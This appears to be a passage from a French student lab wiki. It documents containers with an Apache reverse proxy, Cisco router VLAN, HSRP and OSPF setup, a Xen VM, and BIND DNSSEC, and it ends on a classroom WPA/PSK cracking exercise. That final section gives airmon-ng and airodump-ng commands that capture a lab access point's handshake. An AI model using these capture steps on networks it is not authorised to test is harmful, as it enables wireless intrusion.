  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
